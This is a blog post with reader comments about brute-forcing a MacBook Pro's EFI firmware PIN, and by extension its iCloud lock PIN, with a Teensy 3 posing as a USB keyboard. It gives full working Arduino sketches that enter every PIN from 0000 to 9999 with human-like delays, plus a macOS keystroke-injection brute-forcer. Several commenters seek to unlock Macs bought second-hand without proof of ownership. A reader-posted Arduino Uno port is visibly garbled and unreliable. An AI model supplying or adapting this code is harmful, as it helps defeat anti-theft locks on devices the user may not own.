Updated: The code has already been reviewed and is working, One user I confirm that he implement it with his Teensy 3 and it worked without problems, If you just want to read the code that works without the story behind it, just click here.
Its been said that one must learn from mistakes so I want to share with you mine so that you don't go through the same situation..
A bit of background.
Recently I got my hands on a MacBook Pro that after three weeks of being bought the seller desided that he wanted it back. He expressed this by locking it with a 4 digit PIN and a message that stated “Give me back the laptop and give you back the money”, with out calling or anything..
We both (buyer and I) found it tasteless gesture from the seller especially when he asked to be paid in cash. This is what the screen showed right after turning on the MacBook Pro but without formatting the HDD:
Hands on.
Due to the hostory of this MacBook pro I decided to do a low level format, Mounted the hard drive on another machine and ran `dd if=/dev/random of=/dev/sdd` for about 30 minutes, After that I proceeded to re-assemble the MBP.
To my surprise when I tried to boot from the OSX installation disk to start a clean installation I got a different screen that instead of having 4 numeric fields it had a singe field that accepted as many numeric characteres as you wanted, It appeared that it did not had limits but one thing was clear, it only accepted numeric characters. With a little research I realized that the trick that involved clearing the NVRAM would not work since this MBP had a recent fabrication date and that this hole had been patched.
I decided to attempt it any ways and as expected I got nowhere
.
Some forums suggested to try every combination manually and that some had taken a couple of weeks to go through all 10 of them, sounds good, right? But what if the PIN is the last attempt, how long will it take? what if I miss a number by mistake?
I have 10.000 problems but automating a Brute force attack agains a EFI PIN lock is not one of them.
Knowing that I am sort of dyslexic and how much I'd rather take a walk on the beach with my family I decide to automate this procedure. The logic is simple, a counter from 0 to 9999 and that the out put gets formatted as 4 digits, not rocket science.
What hardware can I use? What modules from the Linux kernel would I have to load to send data from one computer to antoher via USB as if it were a keyboard? Thats how my quest began but I quiclkly realized that I needed specialized hardware for this.
Most of our computers are unable to tell their USB controller to identify them sefl as a HID device (human interface device) making it impossible to do this via a shell script or using python and a simple cable.
A possible solution could be the Arduino but one needs to build a shield for this to work and the cost of this shield (without including the breadboard or a Protoshield) is approximately $24 without shipping and taxes. The alternative is the Teensy which with S/H and takes is just under $23.
The Teensy 3 ended up being the most cost-effectinve hardware for this task, I do however think that builing the Arduino shield would have been more educational but the lack of free time and a reduced budget made the Teensy a better option.
I placed an orther for the Teensy 3 as suggested by Paul Stoffregen, who told me that the version 3 (the most recent) ran on 3 volts unlike previous versions that used 5 volts and that the industry was moving towards 3 volts devices making 5 volts devices obsolete.
Codding the attack
It took just two days to get it delivered after I bought it and within minutes I had ir running a simplified version of the final code.
This version worked without problems on a plain text editor, It was clear to mee that I was going to have to spend more time on this after my first attempt since despite having working with no issues on a plain text editor it failed doing the actual attack on the MacBook pro, some times it will send just one keystroke, others it would send 2 but seemed to me that it would always failed to send “enter”.
The next day with some rest and a clear mind and not after a 12 hours shift I started to tackle the problem. Some one at Apple invested time and hard work on making it difficult for machines to attack it but at he same time easy for humans so I decided that the best way around this and future issues would be to imitate human behavior and I ended up with this code:
#include <usb_keyboard .h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13;
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter < = 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
Keyboard.press(pin[1]);
delay(450);
Keyboard.release(pin[1]);
delay(420);
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}
As you can see I avoid sending the four digits together and assign different values to wait between KeyPress and KeyRelease events. I also have different wait periods between each digit. .
After testing for a couple of minutes I note that the MBP had increased the wait time between attempts so I decided to assign a higher value from the beginning.
Since I decided to keep it simple and spiked on installing a screen to keep an eye on which number it was attempting, I decided to make a script which I ran from my Fedora box 18 giving me an estimated on what number it was trying. The script is simple and uses tow values, the first one is the sum of milliseconds I am using for delay() and the second one is same value plus a second, assuming that my reaction time to start the script or is slower than running the rest of the instructions insert some delay. This is the script:
while true
do
clear
echo
date
start=`date +%s -d "Wed Jan 16 17:46:00"`
current=`date +%s`;
echo "Current PIN Between: " | tr '\n' ' '
echo "($current - $start) / 19.782" | bc | tr '\n' ' '
echo " and " | tr '\n' ' '
echo "($current - $start) / 18.782" | bc
sleep 2
done
This is how my monitor looked while I had the script running, I edited the terminalr profile and used a large font so I could see from the other side of my house what was going on.
Good news, Bad news.
The best thing about automating this attack was reducing the time I would have to spend doing it manually to just forty height hours to go over the ten thousand combinations, Without skipping or repeating any attempt, far less than the three or more weeks that I would have to spend doing it manually.
Overall I am happy, did not spend more than 30 minutes in total programming in a language that I have not practiced and the Teensy worked flawlessly.
The bad news is that I went twice over all combinations and failed to gain access. Apparently when it is locked and you replace/format the hardrive, the EFI generates a new random password 6 numeric characters or more so in the best case would take me at least 197 continuous days. If I had access to some information of the seller I would have tried different combinations using his personal information such as phone number, birthday, etc.. but with none of it this is not an option.
It is clean that I made a huge mistake when I assumed that formatting the disk would bypass this restrictions, if I had to do it again I would certantly spend more time attacking the OS for digit PIN witht he Teensy. I adviced the buyer to take the seller to a small court or to reach to an apple store to see what annswer he gets although I am sure the answer would not be posirive.
Here is a video of the attack:
A little more extreme alternatives.
In a conversation with an Australian who specializes in pentesting mac EFIs (among other things) I was told that an alternative solution would be to get a fresh MBP, extract its firmware and flash it using a PIC programmer. He also told me that there are ways to get around this attacking the thunderbolt port but these two options have a high risk in bricking the $2.000 laptop.
More information regarding EFI can be found on his blog ho.ax I especially recommend this presentation for those who are curious about his work http://ho.ax/posts/2012/10/ruxcon/.
UPDATE: A bug in the code
Recently this blog post got lots of traffic thanks to hackaday and varios community forums which in consecuence made more people look at my code and pointed at an error on it (do you see the importance of Open Source now?).
in the first couple of lines I am sending pin[1] twice and never sending pin[0]. I just fixed the code and tested it on a plain text document, so far everything seems fine, the new code is:
#include <usb_keyboard.h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter <= 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
//sending second digit
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
//sending third digit
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
//sending forth digit
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
//sending enter
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}
I will contact the owner of the laptop to see if he can send it back so that I can start the attack again, this is not possible I would like to hear suggestions on how to test it.
- Tuesday 12 March: I have received confirmation that this code is working, As we can see in this posts at MacRumors: http://forums.macrumors.com/showpost.php?p=16981928&postcount=248
A member from the MacRumors community forums confirmed that he managed to boot from the installation DVD using the Teensy 3 which he required to guess the correct PIN.
Hi, thanks for the article, appreciate your time and effort.
So what I understand is if I haven’t formatted my hard disk and im still on 4 digit pin screen, I can try this method and it will hopefully work? plus as you know after entering pin 5 times, it will be disable for 1 min and 5 mins afterwards. but counter can be reset by changing the language, so is there any way to automate this as well(resetting counter)?
You are correct if you still have the screen where it clearly ask you for 4 digits, then above sketch with some tweaks can help.
There are a couple of ways to do this, lets start from the most easy and slow to the more complex but fast:
You have also asked me privately if some other devices would work, sadly I am not an expert in electronics but from my research you need a device that supports USB HID and for easy programming that is compatible with the Arduino SDK.
I have totally no knowledge on programming. Can you please teach me how to add the code for the thing to wait 5 mins after every 5 attempts?
You could contact Apple and ask them to help. I doubt they will, but it’s worth a try.
Am I missing something or should
Keyboard.press(pin[0]);be here and is not?You sent pin[1] twice, but you didn’t send pin[0]. Is this just a mistake that happened when you made this blog? If this code is what you ran, that would explain why it didn’t work :-)
You have a bug in your sketch – you are sending pin[1] twice instead of pin[0], pin[1].
Also, a LeoStick would be well suited to this problem – it’s a Arduino Leonardo in USB stick form factor, which can act as a HID device out of the box – http://www.freetronics.com/products/leostick
Boy my face is red…. as you guys mentioned, I am sending twice pin[1] instead of sending pin[0]. I ran a quick test on a plain text file to see what happened when I passed 0099 and these are the results:
...0096
0097
0098
0099
1100
1101
1102
1103
1104
...
I will update my post with the correct code in a couple of hours after I test it again and will try to get the buyer to send it back to me again.
You need random delays in this sketch, something like 1-4 seconds after EACH keypress, and maybe 5-10 seconds after you select enter.
If you try to imitate human input, then actually make it like human input.
Human input isn’t in constant miliseconds, but RANDOM SECONDS.
I think it is best to get data on what is the actual human behavior, I am sure there are studies out there that know how fast/slow users write on a laptop keyboard and then go from there.
For example lets say that it turns out that mos people type 1 character each 800ms (just an example), then we could generate random numbers that range from lets say 700ms to 1200ms … with an actual random number generator function.
Hi, i wanted to know if there is a Teensy and LeoStick alternatives, which i can get from uk.
Because both of above mentioned Boards are not available in Uk :(
Thanks..
No idea, have you try contacting Paul from Teensy?
So do you think this code could be modified to work with the 4 digit system easily.
I dont really know much about coding but I do have an extra teensy 2.0 lying around.
I am positive, you might need to modify it so it waits 5 minutes after 3 tries or to do the language change.
To reset the firmware password on newer Macs, you must now follow these steps:
The system will read the file and properly reset the firmware password stored in the Atmel chip. d
Yes, but he paid cash and I am not sure if he got a receipt for it so it would be difficult to proof to apple the ownership of it
Did you not think to try Usb Rubber Ducky (http://hakshop.myshopify.com/products/usb-rubber-ducky)
with this brute-force payload
(http://forums.hak5.org/index.php?/topic/28165-payload-android-brute-force-4-digit-pin/)
???
It is more expensive than a Teensy, more than double and that payload is for android I am not sure the delays and behavior would be the same.
hi, if I understand right, you still stands a password and you do not solve this problem?
Correct but this was due to a bug in the code. I should be receiving the MacBook again in a couple of weeks so that I can test it again.
Hopefully it should work
Hi, could you please explain how to get your code on a teensy? I am new to this. The teensy software only accept hex files, so how you get your txt file on it? Thx
The easiest way is to download the Arduino sdk with support for the Teensy, read these two links:
Hola,
tengo un Teensy 2, puedo utilizarlo para realizar esta prueba ?
Un saludo.
If Jordi, should function.
Thanks :) certainly… And I know I look new (in fact I'm…) how to program or how your program is inserted in the Teensy ? I have no idea.
greetings and thanks.
Start by reading this page: http://www.pjrc.com/teensy/first_use.html
Hello,
worth it, only what is learned and entertaining one :)
I have finally made a Teensy 3 so I downloaded the Teensyduino, but… where and when I have to enter the program code… I have to do the compilation in C ? I'm sorry but my English is bad apart from almost zero, and I can not understand the steps to configure and use.
Greetings
Hello,
I finally got a Teensy 3, but I can not program it :(
I downloaded the software Teensy, and I installed the Arduino 1.0.4, by your program in the Arduino, I give Verify and seems to load properly, and Teensy apacere program in the status bar 56% used y “Press Button to Activate”, teensy pulse button, stops flashing, but not showing “reset”, and if I understand, you have to turn the program Teensy USB connector, but does not ignite at any time.
I'm using Windows 7 and I have disabled the antivirus… do not know what else to try, can you help me.
Greetings.
The code created as it takes 20 seconds to start, if you post the code, try disconnecting the USB, notepat open, put the cursor in the, connect the usb and wait 1 minute ver.
Hello,
I have managed to introduce the program in Teensy3, Thanks to your instructions !!! And finally !!! the code that is inserted into the lock screen (where there is no character limit and are points when writing) is the same that enters the screen which shows the block 4 Numbers spaces ?
Greetings.
The code on this page is for EFI (on the EFI is what allows you to enter the same field more than 1 numeric digit), The code to display the four fields that allow only one digit field is http://orvtech.com/howto/ataque-fuerza-bruta-pin-icloud/.
So if you get the code EFI, will be accessible starting to reinstall ? or always necessary to pin the screen 4 digits ? because with the program and 15 minutes between pin and pin from 6 attempt, this can take several months.. no ?
If you really get your mac code continues with the reinstallation / start depends on how you've chosen to start.
The lock screen four fields (Lock iCloud) disappears after reinstall.
In the worst case the script may take a little more than 50 hours.
Hello,
thanks for your time, and I thank all attempts because understand this mess …
that the script is in the worst case may be delayed 50 hours ?
how I can make pear boot from USB and reinstalling all OSx ?
thanks again, and greetings.
I finally managed to port this code to Arduino Uno (which doesn’t support USB keyboard in the first place.
If anyone wants to know how please let me know so I can post the code here. It is 100% tested.
That is awesome Nades! Go a head. Post it
FINALLY! Success! That was really short, only two hours of runtime and my code was 0604 :)
Thanks.
Here is the Arduino Uno code:
const int ledPin = 13; // choose the pin for the LEDint counter = 0;
int fakecounter = counter;
int counter0=9;
int counter1=9;
int counter2=9;
int counter3=9;
uint8_t buf[8] = { 0 };
void setup() {
Serial.begin(9600);
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
if (counter 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
//while(true)
counter3++;
if(counter3==10)
{
counter3=0;
}
if(counter3 ==9)
{
addOneToCounter2();
}
}
void addOneToCounter2()
{
counter2++;
if(counter2==10)
{
counter2=0;
}if(counter2 ==9)
{
addOneToCounter1();
}
}
void addOneToCounter1()
{
counter1++;
if(counter1==10)
{
counter1=0;
}if(counter1 ==9)
{
addOneToCounter0();
}
}
void addOneToCounter0()
{
counter0++;
if(counter0==10)
{
counter0=0;
}
}
void releaseKey()
{
buf[0] = 0;
buf[2] = 0;
Serial.write(buf, 8); // Release key 1234
}
Hi Swim
I tried your code but I cant seem to get it to type in notepad.
I flashed the UNO so it turned into a USB HID keyboard. I ran some test code and it outputs fine.
When I verify the code in Arduino it shows a on line:
if (counter 9999){
I changed this to:
if (counter > 9999){
But it still doesnt seem to work…any help is greatly appreciated!
Thanks again
Can you both post Model and version? I have been reading and apparently newer Arduino Unos can act as HID after you flash them with another firmware. Older models need some hacking (involves soldering a resistor).
Hi orvtech
Sorry I dont think I was clear. I have flashed my UNO (R3 V3.0 ATMEGA328) with another firmware using instructions from here: http://mitchtech.net/arduino-usb-hid-keyboard/
I have verified its acting as a HID by using sample code (also on that website) called “Random Key/Random Delay” and its working fine in notepad on W7.
The problem comes about when I try to use Swim Atesa’s code. When I verify his code in Arduino IDE I get a error like my earlier post.
So im thinking maybe he has accidentally missed something out when he posted the code here. I was hoping he could verify the code he posted was the same as he used…
Thanks again
Do you think theres any chance we could contact “Nades Atesa” so we can ask him to verify this is the correct code used for his Arduino UNO?
Thanks
post it please
I have a good partner macbook pro 2010 and I have problems with the code as I can get icloud could do me a favor and tell me what steps to take and where to get the so teensy 3 I do not understand much of this
….
is safe to buy the product? http://www.pjrc.com/store
I am in Colombia and here is not the teensy thank you all for your answers
There has to be a teensy necessarily be any device compatible with the Arduino SDK that also support USB HID mode.
I bought my direct Teensy PJRC smoothly.
or do you recommend buying this board with Arduino UNO R3 DIP ATmega328P
edited by admin
Here someone posted the code for an Arduino Uno but I have not tried, is a bit more complicated because you have to schedule you unofficial firmware.
I would go for the Teensy or go to an Apple Store
//…………… omitted includes ………………………………
#include <stdio.h>
#include <CoreFoundation/CoreFoundation.h>
#include <ApplicationServices/ApplicationServices.h>
#include <Carbon/Carbon.h>
#include <IOKit/IOKitLib.h>
I have another PB. I can’t remember my firmware password.
But I can boot on mac OS.
So before going to apple center y have tried to apply your brute force
method to reset password utility found on install DVD (/Applications/Utilities/
My naive test don’t works after 1000 first numbers.
So why your test is only with 1000 first numbers, why not alphanumerics caracters,
Thereafter my modest code.
Thanks
#include <stdio.h>
#include <CoreFoundation/CoreFoundation.h>
#include <ApplicationServices/ApplicationServices.h>
#include <Carbon/Carbon.h>
#include <OKit/IOKitLib.h>
int keyCodeFromKeyString(char * keyString);
CFStringRef createStringForKey(CGKeyCode keyCode);
CGKeyCode keyCodeForChar(const char c);
void testString(ProcessSerialNumber psn, char *str);
//------------------------------------------- main --------------------------------------------
int main(int argc, char *argv[])
{
char buffer[100];
//............ to have time to put pasword utility to front ..................
// install DVD /Applications/Utilities/
usleep(1000000);
//.............. get process ..................................................
ProcessSerialNumber psn;
GetFrontProcess( &psn );
//............... run brute force .............................................
for (int i=0; i<=10000; ++i)
{ sprintf(buffer,"%04i",i);
printf(buffer);
printf("\n");
testString(psn, buffer);
}
}
//------------------------------------------- testString --------------------------------------------
void testString(ProcessSerialNumber psn, char *str)
{ CGKeyCode kcode;
CGEventRef e;
CGEventRef k;
char *pt = str;
while (pt && *pt)
{ kcode = keyCodeForChar(*pt);
e = CGEventCreateKeyboardEvent (NULL, kcode, true);
k = CGEventCreateKeyboardEvent (NULL, kcode, false);
CGEventPostToPSN (&psn,e);
usleep(100);
CGEventPostToPSN (&psn,k);
CFRelease(e);
CFRelease(k);
++pt;
}
kcode = keyCodeForChar(13);
e = CGEventCreateKeyboardEvent (NULL, kcode, true);
k = CGEventCreateKeyboardEvent (NULL, kcode, false);
CGEventPostToPSN (&psn,e);
usleep(100);
CGEventPostToPSN (&psn,k);
CFRelease(e);
CFRelease(k);
}
//------------------------------------------- createStringForKey --------------------------------------------
// Returns string representation of key, if it is printable.
// Ownership follows the Create Rule; that is, it is the caller's
// responsibility to release the returned object.
CFStringRef createStringForKey(CGKeyCode keyCode)
{
TISInputSourceRef currentKeyboard = TISCopyCurrentKeyboardInputSource();
CFDataRef layoutData =
TISGetInputSourceProperty(currentKeyboard,
kTISPropertyUnicodeKeyLayoutData);
const UCKeyboardLayout *keyboardLayout =
(const UCKeyboardLayout *)CFDataGetBytePtr(layoutData);
UInt32 keysDown = 0;
UniChar chars[4];
UniCharCount realLength;
UCKeyTranslate(keyboardLayout,
keyCode,
kUCKeyActionDisplay,
0,
LMGetKbdType(),
kUCKeyTranslateNoDeadKeysBit,
&keysDown,
sizeof(chars) / sizeof(chars[0]),
&realLength,
chars);
CFRelease(currentKeyboard);
return CFStringCreateWithCharacters(kCFAllocatorDefault, chars, 1);
}
//------------------------------------------- keyCodeForChar --------------------------------------------
// Returns key code for given character via the above function, or UINT16_MAX
// on error.
CGKeyCode keyCodeForChar(const char c)
{
static CFMutableDictionaryRef charToCodeDict = NULL;
CGKeyCode code;
UniChar character = c;
CFStringRef charStr = NULL;
// Generate table of keycodes and characters.
if (charToCodeDict == NULL) {
size_t i;
charToCodeDict = CFDictionaryCreateMutable(kCFAllocatorDefault,
128,
&kCFCopyStringDictionaryKeyCallBacks,
NULL);
if (charToCodeDict == NULL) return UINT16_MAX;
// Loop through every keycode (0 - 127) to find its current mapping.
for (i = 0; i < 128; ++i) {
CFStringRef string = createStringForKey((CGKeyCode)i);
if (string != NULL) {
CFDictionaryAddValue(charToCodeDict, string, (const void *)i);
CFRelease(string);
}
}
}
charStr = CFStringCreateWithCharacters(kCFAllocatorDefault, &character, 1);
// Our values may be NULL (0), so we need to use this function.
if (!CFDictionaryGetValueIfPresent(charToCodeDict, charStr,
(const void **)&code)) {
code = UINT16_MAX;
}
CFRelease(charStr);
return code;
}
*edited by admin: code tags break with blank liens
It only uses 5 digit numeric combinations because that is what it accepts. No alphanumeric, special chars, etc..
Ok
I test with 300000 and no result.
DVD (/Applications/Utilities/Firmware Password Utility.app don’t works on same password ?…
thanks,
(i will go in Apple center … just 600 km from where i leave.)
Here the theory, If it was locked form a iOS device it allows you to only enter 4 digits, so it goes from 0000 to 9999 including both numbers.
Some people say that if it was locked from the OS it allows up to 6 digits (numeric also). I have not used the app that you are talking about, for me, the fastes way is to boot int o EFI by pressing the Option key and attacking it from there.
Dear Orvtech,
Im in the same situation as you. Got an iMac which got bricked from the deuce-bag seller. Did you manage to get the code working? And are your Macbook working now?
I have this relative new iMac which is locked too as said. And did the same thing as you, so right now im stuck at the field where there is one long field for a passcode.
Hopefully i can use your code with a Teensy, but i dont want to buy it before i now that its working.
Thanks in advance.
/Jonas
How to load this script in to Teensy3 board? or you sell the board has script pr-eload in there?
Eric
Hi Eric,
To load the code you need to install “Teensyduino” on your computer and use that to flash your Teensy. Take a look at http://www.pjrc.com/teensy/teensyduino.html
Friend Overtech
Leial 100% whole page including feedback so English is also the understanding that these perfectly, analize your code and the comments….
I have almost everything I need, but I have a question,
The MBP is a i5, I came to my workshop but the code must be entered in a single cell with unlimited digits, I also is provided a code of 33 characters as usual
(C0214XXXXXVDTMLAZD923D8XXXXXXX719)
I see, I asked the code is not the same as trying in this topic.
Can you help me with information, since it is not far from the subject, what kind of code is what I seek, what options I have, you can do something?? the origin of the mbp not muydiferente to your customer, do not have tickets for the theme of ownership.
We greatly appreciate your help
That screen you see is the EFI Lock, this code should operate.
Hello Ovrtech,
Firstly for your time, you probably helped lot of users and will helped student like me for sure !!
I tried your code for my teensy 3.0 on my MacBook Air 2012 with 10.8.3 and Arduino 10.3 and teensyduino 1.14.
But when I tried to flash my teensy with your code I have a “compilation erreur” :
usb_keyboard.c.o: In function `usb_keyboard_press_keycode’: /Users/Macbook/Downloads/Arduino.app/Contents/Resources/Java/hardware/teensy/cores/teensy3/usb_keyboard.c:271: undefined reference to `send_now’
collect2: error: ld returned 1 exit status
So my question is, is your code work for Mac user or only for windows ?
And if it’s work how can I fix this erreur ??
Thank’s !!
Nidhal,
I tested this code under OSX and Linux, I have no idea if it works for windows since I have over 12 years that I havent touch that operating system.
Here a couple of tips to help you out:
- Make sure you are using “tenseeduino” instead of Arduino SDK
- Make sure you enable keyboard support on the SDK for this code to work. Here is a screenshot now how to do it:
Tengo un teensy 3 and install all the software and as you say. I do a copy paste to the above TXT and bring it into Sketch (verify / compile) but me an error of ” keyboard_modifier_keys = 0; was not declared in this scope”. What am I doing wrong? Thanks
You have enabled keyboard support in the SDK Teensyduino?
have a mac i bought of craigslist , apprantly was locked , and im stuck at efi mode tried checking keychain files, tried the lock file numbers nothing worked so far, took t to apple, they need the apple id on it, or need the efi codei have the has code.. but if u can tell me where to locate the apple id registedred to the mac i can ask apple to unlock it
Hola about tech , I spend the same , Compre a MacBook Pro , was blocked , send it to Apple and they lowered the snow leopard version , I wanted to upgrade to lion and asks me the damn shtick , I'm not put on computer , as we might talk?
Right now I have no time to go back to the AppStore and let the laptop back. As he took the damn pin?
Thank you very much in advance
Hello,
I had the same problem ORVTECH after verifying that the blockade had iCloud, format the hard disk.
I read in the original post could not release the password EFI with teensy, the mistake I?
I ask to see if it is worth purchasing the teensy and test.
If it was possible to release the effective?
Thank you very much!
Since the new code can release the lock of EFI. There is another code that allows the iCloud release without reformatting.
Friend but where is the new code by pressing nesecito compadre who pamper yourself and thank you very much
People, this code before you, if you have not found, I recommend that fence to apple store, your appointment and ask them to solve the problem beyond. What the apple store charge for this service they should see it as a tax to the lack of synthesis, analysis, reading and interest. Read the article… I've always said that this generation lacks capacity for synthesis and analysis.. everything has to this pre-digested so they understand.
So if you can even being it formatted? Excellent! Where is the code posted?
If it's a good news!
So if you could release although you've already formatted?
The efficient code to release this in this post or this posted in another?
Thank you very much !
In this post http://orvtech.com/howto/atacar-efi-pin-macbook-pro/#UPDATE
orvtech 2 questioning :
thanks for your answers
In this article there is a shell script for that. Read the article.
hi orvtech
i finally got my teensy today, im on windows 8, i went to pjrc website and followed the instructions, i have flashed the teensy with the icloud code that u gave link to as i am stuck at the “enter system pin code to unlock this mac” page.
im sure the code went onto the teensy ok because it tells me %57 used, heres what i done…
open arduino.exe changed board to T3
changed USB Type to keyboard mouse joystick
then i pasted the icloud pin unlock code into the jun06 blank sketch, clicked verify OK
then clicked on Upload..arduino then told me Please press the RESET BUTTON on your Teensy to upload your sketch. Auto-reboot only works if the Teensy is running a previous sketch. The teensy window popped up on my desktop telling me to press button to activate, now the teensy led if off.
when i take it over to the mac and plug it in the led blinks, ive tryed with and without led blinking and allso tryed plugging the usb in first then turning the mac on and allso turning mac on first then plug teensy in once at pinlock page.
how can i test this teensy in notepad to make sure this things working ?
any help or info is much appreciated.
Try this.
On your windows machine, open a notepad, place the cursor inside the notepad (just click in it), then plug the Teensy and wait 2 minutes… you should see it typing.
If you dont, then you did not uploaded the code to it or you have a typo in the code you uploaded.
once i have the code uploaded it should say %57 used correct ?
im sure ive done things correct but just cant see why its not even typing in notepad.
before i flashed the teensy i went and got the needed files..
serial_install.exe , teensyduino.exe and arduino-1.0.5-windows.exe
i installed serial_install and extracted arduino-1.0.5-windows then opened teensyduino and installed all the libraries into arduino-1.0.5-windows.
in teensyduino tools i set board to teensy 3 and USB type: keyboard+mouse+joystick, the serial port was ghosted out as Emulated.(note)when i select serial as usb type its shows com3. but i keep it ghosted out emulated.
in Tools/Programmer what should it be set as ?
mine is : AVRISP mkII is this correct ?
i then copied your code from THIS page as its the ICLOUD code i need flashed, i pasted it into the compiler.. verified the code and uploaded to teensy an here it says %57 used.
i then unplug teensy and open notepad and click so to get curser and then plug in teensy and wait……. then nothing hapens. o_O ? im %99.9 sure ive done things correctly but its that 0.1 thats stopping things :(
have i put wrong code on teensy ? could u show me the final working source code pls or send the source to me via email ? thanx for any help
To be honest I am not 100% sure right now about the “programmer” settings but I can check that in a few days. Make sure you installed “Teensyduino” instead of the Arduino SDK.
The EFI Locking Password accepts just Numbers right? i mean 4 Digits, i gotta buy the Teensy people are asking for 200$ to unlock a Macbook Pro and thats way to much… I cant even afford it lol Looking forward to get a Teensy and flash your code and try it!
Which Teensy people are you talking about? Also, did you took it to the apple store and what answer did you get from them?
Can someone confirm that the EFI pin is definitely 4 numbers? My EFI entry screen has a free textbox and a padlock icon. I can enter letters and numbers of any length in that box.
How do we know that the EFI code is 4 digits?
It is only numbers… it accepts letters but you can only set the PIN with numbers. There is a slight chance that the PIN is of 6 digits instead of 4
Friend apology bother another look around here only I get something very curious, macbook pro after 4 hours or so with teensy 3.0 doing their job goes ,
I leave it all night but taking account as 4 maximum hours I find when I turn it off and see the code out other, may be going ??
very nice thanks for your time
pd: I have effective blocking to try formatting and so I have all the time connected
If you're attacking the EFI and the iCloud, it is possible that in those 4 hours and have found the code. As you were not pending, the computer then stood instructions, until it was shut down for lack of use.
If you're attacking the iCloud, it is likely that in the cycle of 15 minute he enters sleep mode and for any reason to shut down or hibernate.
Good news , are right friend, Many thanks Orvtech worked for me perfectly in these 4 hours and had the code 0725 excellent
I'm glad that I've worked your technique , thanks for all friend , I would like to know if you could explain to me how did you put the code on a screen in real time
again the code works very well for me and icloud confirm that the code is the same as the EFI
I am interested in purchasing the Teensy 3 to unlock some Macbook Pros. I am new to programming and all this so before i buy i would like to check this is the correct procedure to use the Teensy.
If this is all correct, just wondering which code to use as people have posted up a few different codes.
Correct except… download Teensyduino instead or Arduino SDK.